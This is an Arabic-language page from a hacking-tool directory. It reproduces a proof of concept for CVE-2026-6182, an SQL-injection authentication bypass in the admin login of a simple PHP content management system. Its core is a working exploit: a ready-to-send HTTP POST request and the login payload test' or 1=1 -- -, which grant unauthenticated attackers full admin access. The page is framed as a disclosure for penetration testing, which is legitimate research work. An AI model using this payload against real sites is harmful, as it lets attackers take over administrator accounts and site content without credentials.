Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/xmyronn/cve-2026-6182-sqli-auth
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقة
GitHubxmyronn/cve-2026-6182-sqli-auth

CVE-2026-6182-SQLI-auth

إثبات مفهوم لتجاوز المصادقة عبر حقن SQL في نظام إدارة المحتوى البسيط PHP، مما يسمح للمهاجمين غير المصادقين بالحصول على وصول كمسؤول عبر معامل مستخدم مُصمم خصيصًا.

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تجاوز مصادقة SQL Injection - نظام إدارة المحتوى البسيط PHP

الوصف

توجد ثغرة حقن SQL في صفحة تسجيل دخول المشرف في نظام إدارة المحتوى البسيط PHP. معامل user لا يتم تنظيفه قبل تمريره إلى استعلام SQL، مما يسمح لمهاجم غير مصادق بتجاوز المصادقة والحصول على وصول كامل كمسؤول.


تفاصيل الثغرة

  • النوع: حقن SQL (CWE-89)
  • التأثير: تجاوز المصادقة نحصل على وصول كامل كمسؤول
  • الملف المتأثر: /web/admin/login.php
  • المعامل المتأثر: user
  • ناقل الهجوم: عن بُعد، بدون مصادقة **الخطورة: حرجة

البائع

code-projects.org

المنتج

نظام إدارة المحتوى البسيط PHP

الإصدار

1.0


إثبات المفهوم (PoC)

الخطوة 1 - أرسل الطلب التالي في burp:

root@kitploit:~
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded

user=test'+or+1%3D1+--+-&password=test&submit=Login

أو فقط أضف هذا في صفحة تسجيل الدخول Screenshot 2026-04-05 051755

الخطوة 2 - نموذج تسجيل الدخول مع الحمولة:

test' or 1=1 -- -

الخطوة 3 - تم منح الوصول إلى لوحة المشرف:

Screenshot 2026-04-05 054510

التأثير

يمكن لمهاجم عن بُعد غير مصادق تجاوز تسجيل دخول المشرف تمامًا دون معرفة أي بيانات اعتماد، والحصول على تحكم كامل في لوحة المشرف بما في ذلك إضافة المحتوى.


المؤلف

Imad Alvi


المرجع

https://code-projects.org/simple-content-management-system-in-php-with-source-code/

تنزيل الأداة